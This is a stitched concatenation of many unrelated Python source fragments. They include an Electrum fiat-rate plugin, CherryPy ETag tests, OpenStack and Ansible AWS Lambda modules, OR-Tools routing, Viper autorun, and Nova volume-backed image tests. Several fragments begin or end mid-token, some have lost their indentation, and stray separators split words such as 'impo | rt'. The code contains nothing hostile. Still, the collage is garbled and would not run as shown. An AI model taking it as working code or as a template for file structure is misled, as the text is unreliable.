        for tx_hash, conf, is_mine, value, fee, balance, timestamp
        in self.wallet.get_tx_history(account)
    }
def requires_settings(self):
    """This plugin contributes a settings button to the plugins dialog."""
    return True
def toggle(self):
    """Flip the enabled state, repaint the status bar, and report the new state."""
    enabled = BasePlugin.toggle(self)
    self.win.update_status()
    return enabled
def close(self):
    """Stop the background exchange-rate thread."""
    self.exchanger.stop()
def history_tab_update(self):
    """Add a sixth 'Fiat Amount' (USD) column to the history tab.

    Uses CoinDesk daily closing prices for historical transactions and the
    live rate for days with no close yet. Only runs when the user enabled
    'history_rates' in the settings.
    """
    if self.config.get('history_rates', 'unchecked') == "checked":
        try:
            tx_list = self.tx_list
        except Exception:
            # load_wallet() has not populated the cache yet; nothing to do.
            return
        try:
            # Date of the oldest cached transaction: lower bound of the query.
            mintimestr = datetime.datetime.fromtimestamp(int(min(tx_list.items(), key=lambda x: x[1]['timestamp'])[1]['timestamp'])).strftime('%Y-%m-%d')
        except ValueError:
            return
        maxtimestr = datetime.datetime.now().strftime('%Y-%m-%d')
        try:
            resp_hist = self.exchanger.get_json('api.coindesk.com', "/v1/bpi/historical/close.json?start=" + mintimestr + "&end=" + maxtimestr)
        except Exception:
            return
        self.gui.main_window.is_edit = True
        self.gui.main_window.history_list.setColumnCount(6)
        self.gui.main_window.history_list.setHeaderLabels( [ '', _('Date'), _('Description') , _('Amount'), _('Balance'), _('Fiat Amount')] )
        root = self.gui.main_window.history_list.invisibleRootItem()
        childcount = root.childCount()
        for i in range(childcount):
            item = root.child(i)
            try:
                tx_info = tx_list[str(item.data(0, Qt.UserRole).toPyObject())]
            except Exception:
                # Hash not in the cache (presumably a tx newer than load_wallet):
                # look it up in the full history and price it as of "now".
                newtx = self.wallet.get_tx_history()
                v = newtx[[x[0] for x in newtx].index(str(item.data(0, Qt.UserRole).toPyObject()))][3]
                tx_info = {'timestamp':int(datetime.datetime.now().strftime("%s")), 'value': v }
                pass
            tx_time = int(tx_info['timestamp'])
            tx_time_str = datetime.datetime.fromtimestamp(tx_time).strftime('%Y-%m-%d')
            try:
                tx_USD_val = "%.2f %s" % (Decimal(tx_info['value']) / 100000000 * Decimal(resp_hist['bpi'][tx_time_str]), "USD")
            except KeyError:
                # No daily close for that date (e.g. today): use the live rate.
                tx_USD_val = "%.2f %s" % (self.btc_rate * Decimal(tx_info['value'])/100000000 , "USD")
            item.setText(5, tx_USD_val)
            if Decimal(tx_info['value']) < 0:
                # Outgoing amounts are rendered in red.
                item.setForeground(5, QBrush(QColor("#BC1E1E")))
        for i, width in enumerate(self.gui.main_window.column_widths['history']):
            self.gui.main_window.history_list.setColumnWidth(i, width)
        self.gui.main_window.history_list.setColumnWidth(4, 140)
        self.gui.main_window.history_list.setColumnWidth(5, 120)
        self.gui.main_window.is_edit = False
def settings_widget(self, window):
    """Return the button embedded in the plugins dialog that opens our settings."""
    return EnterButton(_('Settings'), self.settings_dialog)
def settings_dialog(self):
d = QDialog()
layout = QGridLayout(d)
layout.addWidget(Q |
import cherrypy
from cherrypy.test import helper
class ETagTest(helper.CPWebCase):
    """Functional tests for the CherryPy 'etags' tool with autotags enabled."""

    def setup_server():
        class Root:
            def resource(self):
                return "Oh wah ta goo Siam."
            resource.exposed = True

            def fail(self, code):
                # Raise a redirect for 3xx codes, an HTTPError otherwise.
                code = int(code)
                if 300 <= code <= 399:
                    raise cherrypy.HTTPRedirect([], code)
                else:
                    raise cherrypy.HTTPError(code)
            fail.exposed = True

            def unicoded(self):
                return u'I am a \u1ee4nicode string.'
            unicoded.exposed = True
            # Encoding must be on so the unicode body can be served.
            unicoded._cp_config = {'tools.encode.on': True}

        # Enable the etags tool with automatic tag generation for every path.
        conf = {'/': {'tools.etags.on': True,
                      'tools.etags.autotags': True,
                      }}
        cherrypy.tree.mount(Root(), config=conf)
    setup_server = staticmethod(setup_server)

    def test_etags(self):
        """If-Match / If-None-Match handling for GET and POST."""
        self.getPage("/resource")
        self.assertStatus('200 OK')
        self.assertHeader('Content-Type', 'text/html;charset=utf-8')
        self.assertBody('Oh wah ta goo Siam.')
        etag = self.assertHeader('ETag')

        # Test If-Match (both valid and invalid)
        self.getPage("/resource", headers=[('If-Match', etag)])
        self.assertStatus("200 OK")
        self.getPage("/resource", headers=[('If-Match', "*")])
        self.assertStatus("200 OK")
        self.getPage("/resource", headers=[('If-Match', "*")], method="POST")
        self.assertStatus("200 OK")
        self.getPage("/resource", headers=[('If-Match', "a bogus tag")])
        self.assertStatus("412 Precondition Failed")

        # Test If-None-Match (both valid and invalid)
        self.getPage("/resource", headers=[('If-None-Match', etag)])
        self.assertStatus(304)
        self.getPage("/resource", method='POST', headers=[('If-None-Match', etag)])
        self.assertStatus("412 Precondition Failed")
        self.getPage("/resource", headers=[('If-None-Match', "*")])
        self.assertStatus(304)
        self.getPage("/resource", headers=[('If-None-Match', "a bogus tag")])
        self.assertStatus("200 OK")

    def test_errors(self):
        """Errors raised in handlers must pass through the etag tool unchanged."""
        self.getPage("/resource")
        self.assertStatus(200)
        etag = self.assertHeader('ETag')

        # Test raising errors in page handler
        self.getPage("/fail/412", headers=[('If-Match', etag)])
        self.assertStatus(412)
        self.getPage("/fail/304", headers=[('If-Match', etag)])
        self.assertStatus(304)
        self.getPage("/fail/412", headers=[('If-None-Match', "*")])
        self.assertStatus(412)
        self.getPage("/fail/304", headers=[('If-None-Match', "*")])
        self.assertStatus(304)

    def test_unicode_body(self):
        """An encoded unicode body gets a stable autotag ETag across requests."""
        self.getPage("/unicoded")
        self.assertStatus(200)
        etag1 = self.assertHeader('ETag')
        self.getPage("/unicoded", headers=[('If-Match', etag1)])
        self.assertStatus(200)
        self.assertHeader('ETag', etag1)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from examples.connect import FLAVOR_NAME
from examples.connect import IMAGE_NAME
from examples.connect import NETWORK_NAME
from examples.connect import SERVER_NAME
"""
Managing profiles in the Cluster service.
For a full guide see
https://developer.openstack.org/sdks/python/openstacksdk/users/guides/cluster.html
"""
def list_profiles(conn):
    """Print every cluster profile, then print them again sorted by name."""
    print("List Profiles:")
    for found in conn.cluster.profiles():
        print(found.to_dict())
    # Same listing, but server-side sorted in ascending name order.
    for found in conn.cluster.profiles(sort='name:asc'):
        print(found.to_dict())
def create_profile(conn):
    """Create an os.nova.server profile named 'os_server' and print it."""
    print("Create Profile:")
    # Server properties come from the shared example connection constants.
    spec = {
        'profile': 'os.nova.server',
        'version': 1.0,
        'properties': {
            'name': SERVER_NAME,
            'flavor': FLAVOR_NAME,
            'image': IMAGE_NAME,
            'networks': {
                'network': NETWORK_NAME
            }
        }
    }
    created = conn.cluster.create_profile('os_server', spec)
    print(created.to_dict())
def get_profile(conn):
    """Fetch the 'os_server' profile by id/name and print its attributes."""
    print("Get Profile:")
    fetched = conn.cluster.get_profile('os_server')
    print(fetched.to_dict())
def find_profile(conn):
    """Locate the 'os_server' profile via the find API and print it."""
    print("Find Profile:")
    found = conn.cluster.find_profile('os_server')
    print(found.to_dict())
def update_profile(conn):
    """Rename the 'os_server' profile to 'old_server' and print the result."""
    print("Update Profile:")
    updated = conn.cluster.update_profile('os_server', name='old_server')
    print(updated.to_dict())
def delete_profile(conn):
    """Delete the 'os_server' profile and confirm on stdout."""
    print("Delete Profile:")
    conn.cluster.delete_profile('os_server')
    print("Profile deleted.")
|
# coding: utf | -8
from django.db import models
class Band(models.Model):
    """A musical band, ordered alphabetically by name by default."""
    # Display name of the band.
    name = models.CharField(max_length=100)
    # Free-form biography text.
    bio = models.TextField()
    # Integer ranking; whether lower or higher is better is not defined here.
    rank = models.IntegerField()

    class Meta:
        # Default queryset ordering: alphabetical by name.
        ordering = ('name',)
#!/usr/bin/env python3
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from SetupTools.SetupConfig import SetupConfig
from Interface.Interface import Interface
import importlib
import logging
class Previewer:
    """Preview installer UI windows named on the command line, in order."""

    def __init__(self):
        # All debug output goes to a dedicated preview log file.
        logging.basicConfig(filename='ArchSetup.preview.log', level=logging.DEBUG, format='%(asctime)s - [%(relativeCreated)6d] - %(name)s - %(levelname)s - %(message)s')
        self.setupconfig = SetupConfig()
        # Interface runs the event loop and reports events via self.callback.
        self.interface = Interface(self.callback)
        self.interface.loop()

    def callback(self, event):
        """React to interface events: build windows on 'init', navigate on 'prev'/'next'."""
        if event == 'init':
            self.windows = []
            self.window_index = 0
            # Each argv entry names both a module under Interface.Windows and
            # the window class inside it.
            for x in sys.argv[1:]:
                i = importlib.import_module("Interface.Windows."+x)
                cl = getattr(i, x)
                self.windows.append(cl(self.callback, self.setupconfig))
            self.interface.addwin(self.windows[self.window_index])
        elif event == 'prev':
            # NOTE(review): at index 0 this becomes -1, i.e. wraps around to
            # the last window — confirm whether that is intended.
            self.window_index -= 1
            self.interface.addwin(self.windows[self.window_index])
        elif event == 'next':
            self.window_index += 1
            if self.window_index == len(self.windows):
                # Walked past the last window: end the preview session.
                self.interface.exit()
                return
            self.interface.addwin(self.windows[self.window_index])
if __name__ == "__main__":
Previewer()
|
#!/usr/bin/env python3
# Copyright 2010-2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple VRP with special locations which need to be visited at end of the route."""
# [START import]
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
# [END import]
def create_data_model():
    """Build the problem data.

    'tokens' holds the token delta per node: the depot (0) and the five
    special nodes (1-5) consume nothing, while every regular node (6-18)
    consumes one token.
    """
    special = [0] * 6    # depot + special nodes 1..5
    regular = [-1] * 13  # regular nodes 6..18
    return {
        'tokens': special + regular,
        # Just needs to be big enough; not a limiting factor.
        'vehicle_tokens': [20, 20, 20, 20],
        'num_vehicles': 4,
        'depot': 0,
    }
def print_solution(manager, routing, solution):
    """Print each vehicle's route with cumulative token counts and distances."""
    print(f'Objective: {solution.ObjectiveValue()}')
    token_dimension = routing.GetDimensionOrDie('Token')
    total_distance = 0
    total_token = 0
    for vehicle_id in range(manager.GetNumberOfVehicles()):
        index = routing.Start(vehicle_id)
        # Only the cumul at the route start is added to the grand total.
        total_token += solution.Value(token_dimension.CumulVar(index))
        plan_output = f'Route for vehicle {vehicle_id}:\n'
        route_distance = 0
        while not routing.IsEnd(index):
            node_index = manager.IndexToNode(index)
            route_token = solution.Value(token_dimension.CumulVar(index))
            plan_output += f' {node_index} Token({route_token}) -> '
            previous_index, index = index, solution.Value(routing.NextVar(index))
            route_distance += routing.GetArcCostForVehicle(
                previous_index, index, vehicle_id)
        # Final (end) node of the route.
        node_index = manager.IndexToNode(index)
        route_token = solution.Value(token_dimension.CumulVar(index))
        plan_output += f' {node_index} Token({route_token})\n'
        plan_output += f'Distance of the route: {route_distance}m\n'
        total_distance += route_distance
        print(plan_output)
    print('Total distance of all routes: {}m'.format(total_distance))
    print('Total token of all routes: {}'.format(total_token))
def main():
    """Solve the CVRP problem with special end-of-route locations."""
    # Instantiate the data problem.
    data = create_data_model()

    # Create the routing index manager.
    manager = pywrapcp.RoutingIndexManager(len(data['tokens']),
                                           data['num_vehicles'], data['depot'])

    # Create Routing Model.
    routing = pywrapcp.RoutingModel(manager)

    # Create and register a transit callback.
    def distance_callback(from_index, to_index):
        """Returns the distance between the two nodes."""
        # Constant distance between any pair of nodes in this toy example.
        del from_index
        del to_index
        return 10

    transit_callback_index = routing.RegisterTransitCallback(distance_callback)
    routing.AddDimension(
        transit_callback_index,
        0,  # null slack
        3000,  # maximum distance per vehicle
        True,  # start cumul to zero
        'distance')
    distance_dimension = routing.GetDimensionOrDie('distance')
    distance_dimension.SetGlobalSpanCostCoefficient(100)

    # Define cost of each arc.
    routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)

    # Add Token constraint.
    def token_callback(from_index):
        """Returns the number of token consumed by the node."""
        # Convert from routing variable Index to tokens NodeIndex.
        from_node = manager.IndexToNode(from_index)
        return data['tokens'][from_node]

    token_callback_index = routing.RegisterUnaryTransitCallback(token_callback)
    routing.AddDimensionWithVehicleCapacity(
        token_callback_index,
        0,  # null capacity slack
        data['vehicle_tokens'],  # vehicle maximum tokens
        False,  # do NOT force start cumul to zero
        'Token')

    # Add constraint: special node can only be visited if token remaining is zero
    token_dimension = routing.GetDimensionOrDie('Token')
    for node in range(1, 6):
        index = manager.NodeToIndex(node)
        routing.solver().Add(token_dimension.CumulVar(index) == 0)

    # Instantiate route start and end times to produce feasible times.
    # [START depot_start_end_times]
    for i in range(manager.GetNumberOfVehicles()):
        routing.AddVariableMinimizedByFinalizer(
            token_dimension.CumulVar(routing.Start(i)))
        routing.AddVariableMinimizedByFinalizer(
            token_dimension.CumulVar(routing.End(i)))
    # [END depot_start_end_times]

    # Setting first solution heuristic.
    search_parameters = pywrapcp.DefaultRoutingSearchParameters()
    search_parameters.first_solution_strategy = (
        routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
    search_parameters.local_search_metaheuristic = (
        routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH)
    search_parameters.time_limit.FromSeconds(1)

    # Solve the problem.
    solution = routing.SolveWithParameters(search_parameters)

    # Print solution on console.
    # [START print_solution]
    if solution:
        print_solution(manager, routing, solution)
    else:
        print('No solution found !')
    # [END print_solution]
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# This file is part of Viper - https://github.com/vip | er-framework/viper
# See the file 'LICENSE' for copying permission.
from viper.common.out import print_info
from viper.common.out import print_error
from viper.common.out import print_output
from viper.core.plugins import __modules__
from viper.core.session impo | rt __sessions__
from viper.core.database import Database
from viper.core.config import __config__
from viper.core.storage import get_sample_path
cfg = __config__
def parse_commands(data):
    """Split a raw command line into (root, args).

    :param data: full command string, e.g. "strings -a".
    :return: tuple of the command name and a (possibly empty) argument list.
             Returns ('', []) for empty/whitespace-only input instead of
             raising IndexError as the original did.
    """
    words = data.split()
    if not words:
        return '', []
    return words[0], words[1:]
def autorun_module(file_hash):
    """Run every configured autorun command against the sample *file_hash*.

    cfg.autorun.commands is a comma-separated list of groups, each group a
    semicolon-separated list of command lines. Opens a session on the sample
    if none is active; optionally stores and prints each module's output.
    """
    if not file_hash:
        return
    if not __sessions__.is_set():
        __sessions__.new(get_sample_path(file_hash))
    for cmd_line in cfg.autorun.commands.split(','):
        for split_command in cmd_line.split(';'):
            split_command = split_command.strip()
            if not split_command:
                continue
            root, args = parse_commands(split_command)
            try:
                if root in __modules__:
                    print_info("Running command \"{0}\"".format(split_command))
                    module = __modules__[root]['obj']()
                    module.set_commandline(args)
                    module.run()
                    if cfg.modules.store_output and __sessions__.is_set():
                        Database().add_analysis(file_hash, split_command, module.output)
                    if cfg.autorun.verbose:
                        print_output(module.output)
                    # Clear the module's accumulated output between commands.
                    del module.output[:]
                else:
                    # Report the individual command, not the whole comma group.
                    print_error("\"{0}\" is not a valid command. Please check your viper.conf file.".format(split_command))
            except Exception:
                # Was a bare ``except:`` — narrowed so SystemExit and
                # KeyboardInterrupt are no longer swallowed; also reports the
                # exact command that failed instead of the outer group.
                print_error("Viper was unable to complete the command {0}".format(split_command))
|
mbda_facts:
query: all
function_name: myFunction
register: my_function_details
# List all versions of a function
- name: List function versions
lambda_facts:
query: versions
function_name: myFunction
register: my_function_versions
# List all lambda function versions
- name: List all function
lambda_facts:
query: all
max_items: 20
- name: show Lambda facts
debug:
var: lambda_facts
'''
RETURN = '''
---
lambda_facts:
description: lambda facts
returned: success
type: dict
lambda_facts.function:
description: lambda function list
returned: success
type: dict
lambda_facts.function.TheName:
description: lambda function information, including event, mapping, and version information
returned: success
type: dict
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, get_aws_connection_info, boto3_conn
import json
import datetime
import sys
import re
try:
from botocore.exceptions import ClientError
except ImportError:
pass # protected by AnsibleAWSModule
def fix_return(node):
    """
    fixup returned dictionary: recursively convert datetimes to strings.

    :param node: arbitrarily nested structure of dicts/lists/scalars
    :return: same structure with every datetime replaced by str(datetime)
    """
    if isinstance(node, datetime.datetime):
        return str(node)
    if isinstance(node, list):
        return [fix_return(entry) for entry in node]
    if isinstance(node, dict):
        return {key: fix_return(value) for key, value in node.items()}
    return node
def alias_details(client, module):
    """
    Returns list of aliases for a specified function.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict: {function_name: {'aliases': [...]}} in snake_case
    """
    lambda_facts = dict()
    function_name = module.params.get('function_name')
    if function_name:
        api_params = dict()
        # Optional pagination controls.
        if module.params.get('max_items'):
            api_params['MaxItems'] = module.params.get('max_items')
        if module.params.get('next_marker'):
            api_params['Marker'] = module.params.get('next_marker')
        try:
            lambda_facts.update(aliases=client.list_aliases(FunctionName=function_name, **api_params)['Aliases'])
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                # Unknown function: report an empty alias list, not a failure.
                lambda_facts.update(aliases=[])
            else:
                module.fail_json_aws(e, msg="Trying to get aliases")
    else:
        module.fail_json(msg='Parameter function_name required for query=aliases.')
    return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def all_details(client, module):
    """
    Returns all lambda related facts.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    # Pagination makes no sense when aggregating every fact category.
    if module.params.get('max_items') or module.params.get('next_marker'):
        module.fail_json(msg='Cannot specify max_items nor next_marker for query=all.')
    function_name = module.params.get('function_name')
    if not function_name:
        # No specific function: just return the configuration listing.
        return dict(config_details(client, module))
    facts = {function_name: {}}
    per_function = facts[function_name]
    # Merge every fact category for the named function, in the same order
    # as the original implementation.
    for detail_fn in (config_details, alias_details, policy_details,
                      version_details, mapping_details):
        per_function.update(detail_fn(client, module)[function_name])
    return facts
def config_details(client, module):
    """
    Returns configuration details for one or all lambda functions.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    lambda_facts = dict()
    function_name = module.params.get('function_name')
    if function_name:
        # Single function: fetch its configuration directly.
        try:
            lambda_facts.update(client.get_function_configuration(FunctionName=function_name))
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                lambda_facts.update(function={})
            else:
                module.fail_json_aws(e, msg="Trying to get {0} configuration".format(function_name))
        return {function_name: camel_dict_to_snake_dict(lambda_facts)}
    # All functions: list them (optionally paginated) and key results by name.
    api_params = dict()
    if module.params.get('max_items'):
        api_params['MaxItems'] = module.params.get('max_items')
    if module.params.get('next_marker'):
        api_params['Marker'] = module.params.get('next_marker')
    try:
        lambda_facts.update(function_list=client.list_functions(**api_params)['Functions'])
    except ClientError as e:
        if e.response['Error']['Code'] == 'ResourceNotFoundException':
            lambda_facts.update(function_list=[])
        else:
            module.fail_json_aws(e, msg="Trying to get function list")
    return {func['FunctionName']: camel_dict_to_snake_dict(func)
            for func in lambda_facts.pop('function_list', [])}
def mapping_details(client, module):
    """
    Returns all lambda event source mappings.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    api_params = dict()
    function_name = module.params.get('function_name')
    # All filters are optional; pass through only the ones that were set.
    if function_name:
        api_params['FunctionName'] = module.params.get('function_name')
    if module.params.get('event_source_arn'):
        api_params['EventSourceArn'] = module.params.get('event_source_arn')
    if module.params.get('max_items'):
        api_params['MaxItems'] = module.params.get('max_items')
    if module.params.get('next_marker'):
        api_params['Marker'] = module.params.get('next_marker')
    lambda_facts = dict()
    try:
        lambda_facts.update(mappings=client.list_event_source_mappings(**api_params)['EventSourceMappings'])
    except ClientError as e:
        if e.response['Error']['Code'] == 'ResourceNotFoundException':
            lambda_facts.update(mappings=[])
        else:
            module.fail_json_aws(e, msg="Trying to get source event mappings")
    snaked = camel_dict_to_snake_dict(lambda_facts)
    # Keyed by function name only when a specific function was requested.
    return {function_name: snaked} if function_name else snaked
def policy_details(client, module):
    """
    Returns policy attached to a lambda function.

    :param client: AWS API client reference (boto3)
    :param module: Ansible module reference
    :return dict:
    """
    # Pagination is meaningless for a single policy document.
    if module.params.get('max_items') or module.params.get('next_marker'):
        module.fail_json(msg='Cannot specify max_items nor next_marker for query=policy.')
    lambda_facts = dict()
    function_name = module.params.get('function_name')
    if function_name:
        try:
            # get_policy returns a JSON string, so decode it before storing.
            lambda_facts.update(policy=json.loads(client.get_policy(FunctionName=function_name)['Policy']))
        except ClientError as e:
            if e.response['Error']['Code'] == 'ResourceNotFoundException':
                lambda_facts.update(policy={})
            else:
                module.fail_json_aws(e, msg="Trying to get {0} policy".format(function_name))
    else:
        module.fail_json(msg='Parameter function_name required for query=policy.')
    return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def version_details(client, module):
"""
Returns all lambda function versions.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
|
from circularbuffer import CircularBuffer
from pytest import raises
def test_index():
    """CircularBuffer.index behaves like str.index: finds a needle, honours a
    start offset, and raises ValueError when the needle is absent or empty."""
    buf = CircularBuffer(32)
    buf.write(b'asdf\r\njkl;\r\n1234\r\n')
    assert buf.index(b'\r\n') == 4
    # Searching from offset 5 skips the first CRLF.
    assert buf.index(b'\r\n', 5) == 10
    with raises(ValueError):
        buf.index(b'x')
    buf.clear()
    # Second fill is one byte longer — presumably to exercise the wrap-around
    # path of the circular buffer; confirm against the buffer implementation.
    buf.write(b'asdf\r\njkl;\r\n1234\r\na')
    assert buf.index(b'\r\n') == 4
    assert buf.index(b'\r\n', 5) == 10
    with raises(ValueError):
        buf.index(b'x')
    # An empty needle is rejected as well.
    with raises(ValueError):
        buf.index(b'')
|
import rpw
from pyrevit.sc | ript import get_logger
logger = get_logger()

selection = rpw.ui.Selection()

# TODO check in only one loop
# Sum over a generator instead of materialising a throwaway list.
number_of_unused_connectors = sum(
    element.ConnectorManager.UnusedConnectors.Size for element in selection)
logger.debug(number_of_unused_connectors)

# More than two open connectors implies the selection spans several loops.
if number_of_unused_connectors > 2:
    rpw.ui.forms.Alert('Please select only one loop')

for element in selection:
    # NOTE(review): this bare attribute access has no visible effect — confirm
    # whether the UnusedConnectors lookup is needed for a side effect or is
    # leftover debugging code that can be removed.
    element.ConnectorManager.UnusedConnectors
|
from elan import *
#Set System description
#Finished
# Exercise the "system description" setting: change it, hard-restart the
# controller, verify the change survived, then reset the field.
Viewer.Start()
Viewer.CloseAndClean()

Configurator.Start()
Configurator.basicinformation.Click()
Configurator.systemname.Wait()
sleep(1)
# Edit field 2 — presumably the system description input; confirm in the UI map.
Configurator.Edit.SetText(2,"Changed")
Configurator.apply.Wait()
Configurator.apply.Click()
# Reboot the controller and wait until it reconnects.
Configurator.RestartHard()
Configurator.WaitForControllerToComeBackOnline()
Configurator.Start()
Configurator.basicinformation.Click()
# The changed description must be visible after the restart.
Configurator.systemdescriptionchangedset.Wait()
# Reset the field to a blank value.
Configurator.Edit.SetText(2," ")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.CloseAndClean()
print(' Finished')
#!/usr/bin/env python3
import inspect
from classes.rgams_SRS import rgams_SRS
from classes.selectorvalve_VICI import selectorvalve_VICI
from classes.selectorvalve_compositeVICI import selectorvalve_compositeVICI
from classes.pressuresensor_WIKA import pressuresensor_WIKA
from classes.pressuresensor_OMEGA import pressuresensor_OMEGA
from classes.temperaturesensor_MAXIM import temperaturesensor_MAXIM
from classes.datafile import datafile
from classes.misc import misc
CLASSES = [ rgams_SRS , selectorvalve_VICI , selectorvalve_compositeVICI , pressuresensor_WIKA , pressuresensor_OMEGA , temperaturesensor_MAXIM , datafile , misc ]

# Emit a LaTeX subsection per class, with one paragraph per public method,
# into python_API.tex. The context manager guarantees the file is closed.
with open('python_API.tex', 'w') as outfile:
    outfile.write('%% THIS NEEDS THE underscore PACKAGE: \\usepackage[strings]{underscore}\n\n')
    for X in CLASSES:
        outfile.write('\subsubsection{Class \\texttt{' + X.__name__ + '}}\n')
        P = inspect.getsourcefile(X)
        # Path relative to the repository's 'python' directory.
        outfile.write('\path{' + P[P.find('python'):] + '}\par\n')
        doc = inspect.getdoc(X)
        if doc is None:
            outfile.write('No class description available.\par')
        else:
            outfile.write(doc + '\par')
        outfile.write('\n\n')
        for name, member in inspect.getmembers(X):
            # Skip dunder attributes (this also covers the __doc__/__init__/
            # __module__ checks the original listed separately).
            if name[0:2] == '__':
                continue
            outfile.write('\paragraph{Method \\texttt{' + name + '}}\n\\vspace{1ex}\n')
            # Direct attribute access replaces the fragile exec() of the
            # original; getmembers already handed us the attribute object.
            doc = member.__doc__
            if doc is None:
                outfile.write('No method description available.\par')
            else:
                # Strip per-line leading whitespace and force LaTeX line breaks.
                u = ''
                for line in doc.splitlines():
                    u = u + line.lstrip() + '\\newline\n'
                outfile.write('\\texttt{' + u + '}')
            outfile.write('\n\n')
|
import scipy.cluster.hierarchy as hcl
from scipy.spatial.distance import squareform
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy.cluster.hierarchy import dendrogram
import scipy
import json
#data = pd | .read_json(path_ | or_buf= 'C:\Users\davtalab\Desktop\outJSON.json')
parsed_json = json.loads(open('C:\Users\davtalab\Desktop\data.json').read())
print parsed_json[1]['id']
|
': {
'name': long_name,
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image, req,
FAKE_UUID, body)
def _do_test_create_volume_backed_image(self, extra_properties):
    """Create an image from a volume-backed instance and verify that the
    snapshot-based block-device-mapping properties land on the image.

    :param extra_properties: dict of extra image metadata to send with the
        createImage request; may be empty.
    """
    def _fake_id(x):
        # Deterministic fake UUID built from a single character.
        return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
    body = dict(createImage=dict(name='snapshot_of_volume_backed'))
    if extra_properties:
        body['createImage']['metadata'] = extra_properties
    image_service = glance.get_default_image_service()
    # Original AMI-style image the instance was booted from.
    bdm = [dict(volume_id=_fake_id('a'),
                volume_size=1,
                device_name='vda',
                delete_on_termination=False)]
    props = dict(kernel_id=_fake_id('b'),
                 ramdisk_id=_fake_id('c'),
                 root_device_name='/dev/vda',
                 block_device_mapping=bdm)
    original_image = dict(properties=props,
                          container_format='ami',
                          status='active',
                          is_public=True)
    image_service.create(None, original_image)

    def fake_block_device_mapping_get_all_by_instance(context, inst_id,
                                                      use_slave=False):
        return [fake_block_device.FakeDbBlockDeviceDict(
            {'volume_id': _fake_id('a'),
             'source_type': 'snapshot',
             'destination_type': 'volume',
             'volume_size': 1,
             'device_name': 'vda',
             'snapshot_id': 1,
             'boot_index': 0,
             'delete_on_termination': False,
             'no_device': None})]
    self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
                   fake_block_device_mapping_get_all_by_instance)
    instance = fakes.fake_instance_get(image_ref=original_image['id'],
                                       vm_state=vm_states.ACTIVE,
                                       root_device_name='/dev/vda')
    self.stubs.Set(db, 'instance_get_by_uuid', instance)
    volume = dict(id=_fake_id('a'),
                  size=1,
                  host='fake',
                  display_description='fake')
    snapshot = dict(id=_fake_id('d'))
    # mox expectations: the API must look up the volume and force a snapshot.
    self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
    volume_api = self.controller.compute_api.volume_api
    volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
    volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
                                     mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
    self.mox.ReplayAll()
    req = fakes.HTTPRequest.blank(self.url)
    response = self.controller._action_create_image(req, FAKE_UUID, body)
    # The new image id is the tail of the Location header.
    location = response.headers['Location']
    image_id = location.replace('http://localhost/v2/fake/images/', '')
    image = image_service.show(None, image_id)
    self.assertEqual(image['name'], 'snapshot_of_volume_backed')
    properties = image['properties']
    self.assertEqual(properties['kernel_id'], _fake_id('b'))
    self.assertEqual(properties['ramdisk_id'], _fake_id('c'))
    self.assertEqual(properties['root_device_name'], '/dev/vda')
    self.assertEqual(properties['bdm_v2'], True)
    bdms = properties['block_device_mapping']
    self.assertEqual(len(bdms), 1)
    self.assertEqual(bdms[0]['boot_index'], 0)
    self.assertEqual(bdms[0]['source_type'], 'snapshot')
    self.assertEqual(bdms[0]['destination_type'], 'volume')
    self.assertEqual(bdms[0]['snapshot_id'], snapshot['id'])
    # Host/instance-specific details must not leak into the image bdm.
    for fld in ('connection_info', 'id',
                'instance_uuid', 'device_name'):
        self.assertNotIn(fld, bdms[0])
    for k in extra_properties.keys():
        self.assertEqual(properties[k], extra_properties[k])
def test_create_volume_backed_image_no_metadata(self):
    """createImage with no extra metadata on the request."""
    self._do_test_create_volume_backed_image({})
def test_create_volume_backed_image_with_metadata(self):
    """Extra request metadata must end up as image properties."""
    self._do_test_create_volume_backed_image(dict(ImageType='Gold',
                                                  ImageVersion='2.0'))
def _test_create_volume_backed_image_with_metadata_from_volume(
        self, extra_metadata=None):
    """Image metadata is copied from the volume's volume_image_metadata,
    with any request-supplied metadata layered on top.

